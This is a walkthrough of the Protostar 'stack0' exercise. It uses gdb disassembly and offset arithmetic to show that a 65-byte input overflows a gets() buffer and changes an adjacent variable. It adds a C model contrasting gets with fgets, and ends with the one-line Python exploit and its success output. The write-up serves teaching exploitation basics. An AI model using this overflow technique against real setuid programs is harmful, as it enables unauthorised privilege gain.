protostar - stack 0
Let's check the file type of our binary using the file command,
$ file stack0
stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
This is a 32-bit, dynamically linked, setuid binary that is not stripped, so the symbol names (main, gets, puts) are still available to the debugger.
Let's try running our binary,
$ ./stack0
monish
Try again?
Let's view the source code for a proper understanding,
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;   /* volatile so the compiler keeps the check below */
  char buffer[64];

  modified = 0;
  gets(buffer);            /* no length check: a long line runs past buffer */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
gets reads a line without any bound, so input longer than 64 bytes runs off the end of buffer. We need to use that overflow to change the modified variable to any non-zero value, which makes the program print the success message.
Let's use our debugger to analyse this program. Disassembling main(),
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
Here modified is set to 0:
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
so modified lives at $esp+0x5c.
The frame itself was allocated by sub esp,0x60. The next instruction computes the address of buffer, which is then stored at [esp] as the argument to gets:
0x08048405 <main+17>: lea eax,[esp+0x1c]
so buffer starts at $esp+0x1c.
To overwrite modified we need the distance between the two. Both offsets are relative to the same esp, since nothing is pushed between the two instructions:
>>> print(0x5c-0x1c)
64
So buffer's 64 bytes end exactly where modified begins. 64 bytes fill buffer, and the 65th byte lands in the lowest byte of modified (x86 is little-endian), which makes it non-zero. A 64-byte line is not enough: gets writes its terminating NUL into that byte, so modified stays 0. We therefore need to pass 64 + 1 bytes to overwrite modified.
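The layout reasoning above can be checked without the Protostar VM. The following is an added example, not part of the original writeup or the Protostar binary: it models stack0's frame as a struct with buffer immediately followed by modified (the same 64-byte distance the disassembly shows, chosen here so the layout is deterministic rather than left to the compiler), replaces gets with an unchecked copy and fgets with a bounded one, and builds the same 'A'-filled payload the exploit pipes in. The struct, the function names and the payload helper are this example's own constructions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for stack0's stack frame. The disassembly puts
 * buffer at esp+0x1c and modified at esp+0x5c, so modified sits 64 bytes
 * above the start of buffer; this struct reproduces that layout
 * deterministically instead of relying on the compiler's frame layout. */
#define BUFFER_OFF   0x1c
#define MODIFIED_OFF 0x5c
#define DISTANCE     (MODIFIED_OFF - BUFFER_OFF)   /* 64 */

struct frame {
    char buffer[64];
    int  modified;   /* the real binary marks it volatile; here it is written
                        through a char pointer, which the compiler must assume
                        can alias it, so the re-read below is not optimised away */
};

/* Mimics gets(buffer): copies input up to a newline with no length check and
 * then appends a NUL. Bytes 64 and beyond land in modified. The loop is capped
 * at the end of the frame only so the demo itself stays memory-safe; the real
 * gets() has no cap at all. Returns the value of modified afterwards. */
static int unsafe_read(struct frame *f, const char *input)
{
    unsigned char *raw = (unsigned char *)f;   /* the frame viewed as raw bytes */
    size_t i = 0;
    f->modified = 0;                            /* mov [esp+0x5c], 0 */
    while (input[i] != '\0' && input[i] != '\n' && i < sizeof *f - 1) {
        raw[i] = (unsigned char)input[i];       /* no check against sizeof buffer */
        i++;
    }
    raw[i] = '\0';                              /* gets() terminator */
    return f->modified;
}

/* The fix: fgets(buffer, sizeof buffer, stdin) reads at most 63 bytes plus
 * the NUL, so the copy can never reach modified. */
static int safe_read(struct frame *f, const char *input)
{
    size_t n = 0;
    f->modified = 0;
    while (n < sizeof f->buffer - 1 && input[n] != '\0' && input[n] != '\n') {
        f->buffer[n] = input[n];
        n++;
    }
    f->buffer[n] = '\0';
    return f->modified;
}

/* Builds the line the exploit pipes into stdin: DISTANCE filler bytes to
 * fill buffer, plus `extra` bytes that spill into modified. Returns the
 * payload length, or 0 if it does not fit in out. */
static size_t build_payload(char *out, size_t cap, size_t extra)
{
    size_t len = DISTANCE + extra;
    if (len + 1 > cap)
        return 0;
    memset(out, 'A', len);
    out[len] = '\0';
    return len;
}

/* Feeds a payload with `extra` spill bytes to either the gets() model or the
 * fgets() model and returns the resulting value of modified. */
static int run_case(size_t extra, int use_safe)
{
    struct frame f;
    char payload[128];
    memset(&f, 0, sizeof f);
    if (build_payload(payload, sizeof payload, extra) == 0)
        return -1;
    return use_safe ? safe_read(&f, payload) : unsafe_read(&f, payload);
}

int main(void)
{
    printf("64 bytes, gets  -> modified = 0x%x\n", run_case(0, 0));
    printf("65 bytes, gets  -> modified = 0x%x\n", run_case(1, 0));
    printf("65 bytes, fgets -> modified = 0x%x\n", run_case(1, 1));
    return 0;
}
```

With 64 bytes the gets model leaves modified at 0, because the terminating NUL is what lands in its low byte; with 65 bytes that byte becomes 'A' (0x41) and the check passes, while the fgets model stays at 0 no matter how long the line is.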
Let's try our exploit,
$ python -c "print('A'*65)" | ./stack0
you have changed the 'modified' variable
Done! We have completed "stack0".